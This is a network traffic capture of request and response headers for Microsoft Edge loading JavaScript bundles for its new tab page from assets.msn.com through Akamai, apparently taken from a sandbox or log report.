date: Sat, 31 Dec 2022 00:06:17 GMT
akamai-request-bc: [a=88.221.24.111,b=431576954,c=g,n=NL__AMSTERDAM,o=20940]
server-timing: clientrtt; dur=22, clienttt; dur=0, origin; dur=0 , cdntime; dur=0
akamai-cache-status: Hit from child
content-type: application/javascript
akamai-server-ip: 88.221.24.111
akamai-request-id: 19b9577a
access-control-allow-credentials: true
access-control-allow-origin: https://ntp.msn.com
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://deff.nelreports.net/api/report?cat=msn"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":0.25}
cache-control: public, no-transform, max-age=31535892
timing-allow-origin: *
vary: Origin
-
GEThttps://assets.msn.com/bundles/v1/edgeChromium/latest/money-info-shared-state.7b1eab02b83490d587c9.jsmsedge.exeRemote address:88.221.24.115:443RequestGET /bundles/v1/edgeChromium/latest/money-info-shared-state.7b1eab02b83490d587c9.js HTTP/2.0
host: assets.msn.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
origin: https://ntp.msn.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: */*
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: script
referer: https://ntp.msn.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-md5: CtzD9bY2nLMUXr7eJKVm+A==
last-modified: Tue, 20 Dec 2022 05:42:21 GMT
etag: 0x8DAE24CF6E5F986
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 3b6f5410-901e-0079-055a-148c8b000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
content-encoding: br
date: Sat, 31 Dec 2022 00:06:17 GMT
akamai-request-bc: [a=88.221.24.111,b=431576958,c=g,n=NL__AMSTERDAM,o=20940]
server-timing: clientrtt; dur=22, clienttt; dur=1, origin; dur=0 , cdntime; dur=1
akamai-cache-status: Hit from child
content-type: application/javascript
akamai-server-ip: 88.221.24.111
akamai-request-id: 19b9577e
access-control-allow-credentials: true
access-control-allow-origin: https://ntp.msn.com
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://deff.nelreports.net/api/report?cat=msn"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":0.25}
cache-control: public, no-transform, max-age=31535892
timing-allow-origin: *
vary: Origin
-
GEThttps://assets.msn.com/bundles/v1/edgeChromium/latest/diagnostic-web-vitals.4413feeef57b90b9f7b4.jsmsedge.exeRemote address:88.221.24.115:443RequestGET /bundles/v1/edgeChromium/latest/diagnostic-web-vitals.4413feeef57b90b9f7b4.js HTTP/2.0
host: assets.msn.com
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: */*
origin: https://ntp.msn.com
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://ntp.msn.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-md5: HTvW0QgJLb9J27wmwoaRxA==
last-modified: Fri, 16 Dec 2022 21:57:05 GMT
etag: 0x8DADFB078366D0C
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: bc93a4eb-801e-0070-4499-13ff98000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
content-encoding: br
date: Sat, 31 Dec 2022 00:06:17 GMT
akamai-request-bc: [a=88.221.24.111,b=431577041,c=g,n=NL__AMSTERDAM,o=20940]
server-timing: clientrtt; dur=21, clienttt; dur=1, origin; dur=0 , cdntime; dur=1
akamai-cache-status: Hit from child
content-type: application/javascript
akamai-server-ip: 88.221.24.111
akamai-request-id: 19b957d1
access-control-allow-credentials: true
access-control-allow-origin: https://ntp.msn.com
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://deff.nelreports.net/api/report?cat=msn"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":0.25}
cache-control: public, no-transform, max-age=31535892
timing-allow-origin: *
vary: Origin
-
GEThttps://assets.msn.com/bundles/v1/edgeChromium/latest/digest-card.9433690b76803ea3f447.jsmsedge.exeRemote address:88.221.24.115:443RequestGET /bundles/v1/edgeChromium/latest/digest-card.9433690b76803ea3f447.js HTTP/2.0
host: assets.msn.com
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: */*
origin: https://ntp.msn.com
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://ntp.msn.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-md5: STCjJwbCOp5hqqGUUZl07A==
last-modified: Tue, 20 Dec 2022 05:42:21 GMT
etag: 0x8DAE24CF717D7A9
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 2fcc03ce-601e-0052-585c-1438af000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
content-encoding: br
date: Sat, 31 Dec 2022 00:06:17 GMT
akamai-request-bc: [a=88.221.24.111,b=431577183,c=g,n=NL__AMSTERDAM,o=20940]
server-timing: clientrtt; dur=28, clienttt; dur=0, origin; dur=0 , cdntime; dur=0
akamai-cache-status: Hit from child
content-type: application/javascript
akamai-server-ip: 88.221.24.111
akamai-request-id: 19b9585f
access-control-allow-credentials: true
access-control-allow-origin: https://ntp.msn.com
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://deff.nelreports.net/api/report?cat=msn"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":0.25}
cache-control: public, no-transform, max-age=31535892
timing-allow-origin: *
vary: Origin
-
GEThttps://assets.msn.com/bundles/v1/edgeChromium/latest/edge-shopping.b3320f6f6901d2d614c9.jsmsedge.exeRemote address:88.221.24.115:443RequestGET /bundles/v1/edgeChromium/latest/edge-shopping.b3320f6f6901d2d614c9.js HTTP/2.0
host: assets.msn.com
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: */*
origin: https://ntp.msn.com
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://ntp.msn.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-md5: ezXGKg0jS6CqsPoH+4/0ww==
last-modified: Fri, 16 Dec 2022 21:57:03 GMT
etag: 0x8DADFB0772F5CC0
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: d65447d8-101e-005d-7576-13b1b0000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
content-encoding: br
date: Sat, 31 Dec 2022 00:06:17 GMT
akamai-request-bc: [a=88.221.24.111,b=431577454,c=g,n=NL__AMSTERDAM,o=20940]
server-timing: clientrtt; dur=34, clienttt; dur=0, origin; dur=0 , cdntime; dur=0
akamai-cache-status: Hit from child
content-type: application/javascript
akamai-server-ip: 88.221.24.111
akamai-request-id: 19b9596e
access-control-allow-credentials: true
access-control-allow-origin: https://ntp.msn.com
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://deff.nelreports.net/api/report?cat=msn"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":0.25}
cache-control: public, no-transform, max-age=31535892
timing-allow-origin: *
vary: Origin
-
Remote address:88.221.24.115:443RequestGET /bundles/v1/edgeChromium/latest/EdgeNextPage.constants.js HTTP/2.0
host: assets.msn.com
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: */*
origin: https://ntp.msn.com
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://ntp.msn.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-md5: nXbL4jSaEHnr/kaAFVdYkA==
last-modified: Fri, 16 Dec 2022 21:57:09 GMT
etag: 0x8DADFB07B17282A
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 81ed3af8-901e-0055-6b4c-12e9a1000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
content-encoding: gzip
date: Sat, 31 Dec 2022 00:06:17 GMT
content-length: 440
akamai-request-bc: [a=88.221.24.111,b=431577645,c=g,n=NL__AMSTERDAM,o=20940]
server-timing: clientrtt; dur=27, clienttt; dur=0, origin; dur=0 , cdntime; dur=0
akamai-cache-status: Hit from child
akamai-server-ip: 88.221.24.111
akamai-request-id: 19b95a2d
access-control-allow-credentials: true
access-control-allow-origin: https://ntp.msn.com
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://deff.nelreports.net/api/report?cat=msn"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":0.25}
cache-control: public, no-transform, max-age=31535892
timing-allow-origin: *
vary: Origin
-
Remote address:88.221.24.115:443RequestGET /bundles/v1/edgeChromium/latest/EdgeNextSSRInteropContract.js HTTP/2.0
host: assets.msn.com
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: */*
origin: https://ntp.msn.com
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://ntp.msn.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-md5: MqsWe5UNBK5UhlUMrexxyw==
last-modified: Fri, 16 Dec 2022 21:57:06 GMT
etag: 0x8DADFB078D04C99
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: fdb0c7c8-a01e-0026-0af4-1266a7000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
content-encoding: gzip
content-length: 400
date: Sat, 31 Dec 2022 00:06:17 GMT
akamai-request-bc: [a=88.221.24.111,b=431577791,c=g,n=NL__AMSTERDAM,o=20940]
server-timing: clientrtt; dur=31, clienttt; dur=0, origin; dur=0 , cdntime; dur=0
akamai-cache-status: Hit from child
akamai-server-ip: 88.221.24.111
akamai-request-id: 19b95abf
access-control-allow-credentials: true
access-control-allow-origin: https://ntp.msn.com
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://deff.nelreports.net/api/report?cat=msn"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":0.25}
cache-control: public, no-transform, max-age=31535892
timing-allow-origin: *
vary: Origin
-
Remote address:88.221.24.115:443RequestGET /bundles/v1/edgeChromium/latest/EdgeNextTelemetry.js HTTP/2.0
host: assets.msn.com
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: */*
origin: https://ntp.msn.com
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://ntp.msn.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-md5: rsa63FjFr6at9hLeVXt8TQ==
last-modified: Tue, 20 Dec 2022 23:56:05 GMT
etag: 0x8DAE2E5C1D663A0
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 243cd3f3-f01e-0017-07af-176cb4000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
content-encoding: gzip
date: Sat, 31 Dec 2022 00:06:17 GMT
content-length: 3479
akamai-request-bc: [a=88.221.24.111,b=431577868,c=g,n=NL__AMSTERDAM,o=20940]
server-timing: clientrtt; dur=33, clienttt; dur=0, origin; dur=0 , cdntime; dur=0
akamai-cache-status: Hit from child
akamai-server-ip: 88.221.24.111
akamai-request-id: 19b95b0c
access-control-allow-credentials: true
access-control-allow-origin: https://ntp.msn.com
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://deff.nelreports.net/api/report?cat=msn"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":0.25}
cache-control: public, no-transform, max-age=31535892
timing-allow-origin: *
vary: Origin
-
GEThttps://assets.msn.com/bundles/v1/edgeChromium/latest/esports-card.3f958efc90cd39f2bea1.jsmsedge.exeRemote address:88.221.24.115:443RequestGET /bundles/v1/edgeChromium/latest/esports-card.3f958efc90cd39f2bea1.js HTTP/2.0
host: assets.msn.com
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: */*
origin: https://ntp.msn.com
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://ntp.msn.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-md5: buxQ52bR0nh+dyTcxX8IhQ==
last-modified: Tue, 20 Dec 2022 23:56:07 GMT
etag: 0x8DAE2E5C307B20B
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 27fe5ccc-701e-005b-0a35-1c4bbc000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
content-encoding: br
date: Sat, 31 Dec 2022 00:06:17 GMT
akamai-request-bc: [a=88.221.24.111,b=431578013,c=g,n=NL__AMSTERDAM,o=20940]
server-timing: clientrtt; dur=30, clienttt; dur=0, origin; dur=0 , cdntime; dur=0
akamai-cache-status: Hit from child
content-type: application/javascript
akamai-server-ip: 88.221.24.111
akamai-request-id: 19b95b9d
access-control-allow-credentials: true
access-control-allow-origin: https://ntp.msn.com
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://deff.nelreports.net/api/report?cat=msn"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":0.25}
cache-control: public, no-transform, max-age=31535892
timing-allow-origin: *
vary: Origin
-
GEThttps://assets.msn.com/bundles/v1/edgeChromium/latest/esports-streams-card.c78faed25a679855e974.jsmsedge.exeRemote address:88.221.24.115:443RequestGET /bundles/v1/edgeChromium/latest/esports-streams-card.c78faed25a679855e974.js HTTP/2.0
host: assets.msn.com
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: */*
origin: https://ntp.msn.com
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://ntp.msn.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-md5: giHQ5JTu7Z9ogS6nLJ11Lw==
last-modified: Tue, 20 Dec 2022 23:56:08 GMT
etag: 0x8DAE2E5C3C8E9EE
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 593c35e2-701e-00f3-70c7-16d5cb000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
content-encoding: br
date: Sat, 31 Dec 2022 00:06:17 GMT
akamai-request-bc: [a=88.221.24.111,b=431578157,c=g,n=NL__AMSTERDAM,o=20940]
server-timing: clientrtt; dur=28, clienttt; dur=0, origin; dur=0 , cdntime; dur=0
akamai-cache-status: Hit from child
content-type: application/javascript
akamai-server-ip: 88.221.24.111
akamai-request-id: 19b95c2d
access-control-allow-credentials: true
access-control-allow-origin: https://ntp.msn.com
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://deff.nelreports.net/api/report?cat=msn"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":0.25}
cache-control: public, no-transform, max-age=31535892
timing-allow-origin: *
vary: Origin
-
GEThttps://assets.msn.com/bundles/v1/edgeChromium/latest/ExperienceLoadedData.503d466bcf252ff0962b.jsmsedge.exeRemote address:88.221.24.115:443RequestGET /bundles/v1/edgeChromium/latest/ExperienceLoadedData.503d466bcf252ff0962b.js HTTP/2.0
host: assets.msn.com
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: */*
origin: https://ntp.msn.com
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://ntp.msn.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-md5: i0LNxXwQ7ssfddpNK+qu8g==
last-modified: Tue, 20 Dec 2022 05:42:19 GMT
etag: 0x8DAE24CF57D9D8E
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: f3db9563-101e-00f5-025a-142fc7000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
content-encoding: br
date: Sat, 31 Dec 2022 00:06:18 GMT
akamai-request-bc: [a=88.221.24.111,b=431578594,c=g,n=NL__AMSTERDAM,o=20940]
server-timing: clientrtt; dur=44, clienttt; dur=1, origin; dur=0 , cdntime; dur=1
akamai-cache-status: Hit from child
content-type: application/javascript
akamai-server-ip: 88.221.24.111
akamai-request-id: 19b95de2
access-control-allow-credentials: true
access-control-allow-origin: https://ntp.msn.com
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://deff.nelreports.net/api/report?cat=msn"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":0.25}
cache-control: public, no-transform, max-age=31535892
timing-allow-origin: *
vary: Origin
-
GEThttps://assets.msn.com/bundles/v1/edgeChromium/latest/experiences_shopping-page-base_dist_ShoppingBaseExperience_js-experiences_shopping-page-base_-616b96.0f1e1b7c26f4196e5078.jsmsedge.exeRemote address:88.221.24.115:443RequestGET /bundles/v1/edgeChromium/latest/experiences_shopping-page-base_dist_ShoppingBaseExperience_js-experiences_shopping-page-base_-616b96.0f1e1b7c26f4196e5078.js HTTP/2.0
host: assets.msn.com
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: */*
origin: https://ntp.msn.com
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://ntp.msn.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-md5: sOfPwd6r2Ci/EvkvRQz7Fg==
last-modified: Tue, 20 Dec 2022 05:42:20 GMT
etag: 0x8DAE24CF61274C5
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: d7e10ccc-201e-0096-295c-1410e3000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
content-encoding: br
date: Sat, 31 Dec 2022 00:06:18 GMT
akamai-request-bc: [a=88.221.24.111,b=431578763,c=g,n=NL__AMSTERDAM,o=20940]
server-timing: clientrtt; dur=49, clienttt; dur=0, origin; dur=0 , cdntime; dur=0
akamai-cache-status: Hit from child
content-type: application/javascript
akamai-server-ip: 88.221.24.111
akamai-request-id: 19b95e8b
access-control-allow-credentials: true
access-control-allow-origin: https://ntp.msn.com
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://deff.nelreports.net/api/report?cat=msn"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":0.25}
cache-control: public, no-transform, max-age=31535892
timing-allow-origin: *
vary: Origin
-
GEThttps://assets.msn.com/bundles/v1/edgeChromium/latest/experiences_sports-card-wc_dist_components_sports-coldstart_index_js.e9c7427677f899fd847a.jsmsedge.exeRemote address:88.221.24.115:443RequestGET /bundles/v1/edgeChromium/latest/experiences_sports-card-wc_dist_components_sports-coldstart_index_js.e9c7427677f899fd847a.js HTTP/2.0
host: assets.msn.com
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: */*
origin: https://ntp.msn.com
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://ntp.msn.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-md5: h7t1uSCEkzJ762G6lXWMAQ==
last-modified: Tue, 20 Dec 2022 05:42:18 GMT
etag: 0x8DAE24CF4EB5E07
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 854346f5-f01e-002b-1b5c-14b9bc000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
content-encoding: br
date: Sat, 31 Dec 2022 00:06:18 GMT
akamai-request-bc: [a=88.221.24.111,b=431578991,c=g,n=NL__AMSTERDAM,o=20940]
server-timing: clientrtt; dur=34, clienttt; dur=1, origin; dur=0 , cdntime; dur=1
akamai-cache-status: Hit from child
content-type: application/javascript
akamai-server-ip: 88.221.24.111
akamai-request-id: 19b95f6f
access-control-allow-credentials: true
access-control-allow-origin: https://ntp.msn.com
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://deff.nelreports.net/api/report?cat=msn"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":0.25}
cache-control: public, no-transform, max-age=31535892
timing-allow-origin: *
vary: Origin
-
GEThttps://assets.msn.com/bundles/v1/edgeChromium/latest/experiences_sports-card-wc_dist_components_sports-feedback_index_js.385f3a79ac2984385764.jsmsedge.exeRemote address:88.221.24.115:443RequestGET /bundles/v1/edgeChromium/latest/experiences_sports-card-wc_dist_components_sports-feedback_index_js.385f3a79ac2984385764.js HTTP/2.0
host: assets.msn.com
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: */*
origin: https://ntp.msn.com
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://ntp.msn.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-md5: OLOzYJnqlCivq1rSZWKXPg==
last-modified: Tue, 20 Dec 2022 05:42:23 GMT
etag: 0x8DAE24CF7F71A76
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 621f5b7e-901e-0001-0e5a-14269a000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
content-encoding: br
date: Sat, 31 Dec 2022 00:06:18 GMT
akamai-request-bc: [a=88.221.24.111,b=431579200,c=g,n=NL__AMSTERDAM,o=20940]
server-timing: clientrtt; dur=43, clienttt; dur=0, origin; dur=0 , cdntime; dur=0
akamai-cache-status: Hit from child
content-type: application/javascript
akamai-server-ip: 88.221.24.111
akamai-request-id: 19b96040
access-control-allow-credentials: true
access-control-allow-origin: https://ntp.msn.com
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://deff.nelreports.net/api/report?cat=msn"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":0.25}
cache-control: public, no-transform, max-age=31535892
timing-allow-origin: *
vary: Origin
-
GEThttps://assets.msn.com/bundles/v1/edgeChromium/latest/experiences_sports-card-wc_dist_components_sports-hidepopup_index_js.6d4201d917bde3412a35.jsmsedge.exeRemote address:88.221.24.115:443RequestGET /bundles/v1/edgeChromium/latest/experiences_sports-card-wc_dist_components_sports-hidepopup_index_js.6d4201d917bde3412a35.js HTTP/2.0
host: assets.msn.com
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: */*
origin: https://ntp.msn.com
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://ntp.msn.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-md5: MRFwTbo4K5NsBZ3pQc9aCA==
last-modified: Tue, 20 Dec 2022 05:42:19 GMT
etag: 0x8DAE24CF5C7BB1B
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 3b6f8376-901e-0079-555a-148c8b000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
content-encoding: br
date: Sat, 31 Dec 2022 00:06:18 GMT
akamai-request-bc: [a=88.221.24.111,b=431579352,c=g,n=NL__AMSTERDAM,o=20940]
server-timing: clientrtt; dur=37, clienttt; dur=0, origin; dur=0 , cdntime; dur=0
akamai-cache-status: Hit from child
content-type: application/javascript
akamai-server-ip: 88.221.24.111
akamai-request-id: 19b960d8
access-control-allow-credentials: true
access-control-allow-origin: https://ntp.msn.com
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://deff.nelreports.net/api/report?cat=msn"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":0.25}
cache-control: public, no-transform, max-age=31535892
timing-allow-origin: *
vary: Origin
-
GEThttps://assets.msn.com/bundles/v1/edgeChromium/latest/experiences_sports-card-wc_dist_components_sports-hidereminder_index_js.0e7d87527d8dba739255.jsmsedge.exeRemote address:88.221.24.115:443RequestGET /bundles/v1/edgeChromium/latest/experiences_sports-card-wc_dist_components_sports-hidereminder_index_js.0e7d87527d8dba739255.js HTTP/2.0
host: assets.msn.com
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: */*
origin: https://ntp.msn.com
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://ntp.msn.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-md5: 9e1XMub0iHJFCc1eoDr/0w==
last-modified: Tue, 20 Dec 2022 05:42:19 GMT
etag: 0x8DAE24CF604460A
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: ab900b5c-401e-00c4-0a5a-1425d4000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
content-encoding: br
date: Sat, 31 Dec 2022 00:06:18 GMT
akamai-request-bc: [a=88.221.24.111,b=431579518,c=g,n=NL__AMSTERDAM,o=20940]
server-timing: clientrtt; dur=43, clienttt; dur=0, origin; dur=0 , cdntime; dur=0
akamai-cache-status: Hit from child
content-type: application/javascript
akamai-server-ip: 88.221.24.111
akamai-request-id: 19b9617e
access-control-allow-credentials: true
access-control-allow-origin: https://ntp.msn.com
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://deff.nelreports.net/api/report?cat=msn"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":0.25}
cache-control: public, no-transform, max-age=31535892
timing-allow-origin: *
vary: Origin
-
GEThttps://assets.msn.com/bundles/v1/edgeChromium/latest/experiences_sports-card-wc_dist_SportsCardWCNavigationList_template_js.808253cefe995531ddee.jsmsedge.exeRemote address:88.221.24.115:443RequestGET /bundles/v1/edgeChromium/latest/experiences_sports-card-wc_dist_SportsCardWCNavigationList_template_js.808253cefe995531ddee.js HTTP/2.0
host: assets.msn.com
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: */*
origin: https://ntp.msn.com
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://ntp.msn.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-md5: lrMX5B4tV2ikusfUv2591A==
last-modified: Fri, 16 Dec 2022 21:57:03 GMT
etag: 0x8DADFB077502662
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 5a988347-701e-0077-2300-142e96000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
content-encoding: br
date: Sat, 31 Dec 2022 00:06:18 GMT
akamai-request-bc: [a=88.221.24.111,b=431579662,c=g,n=NL__AMSTERDAM,o=20940]
server-timing: clientrtt; dur=40, clienttt; dur=0, origin; dur=0 , cdntime; dur=0
akamai-cache-status: Hit from child
content-type: application/javascript
akamai-server-ip: 88.221.24.111
akamai-request-id: 19b9620e
access-control-allow-credentials: true
access-control-allow-origin: https://ntp.msn.com
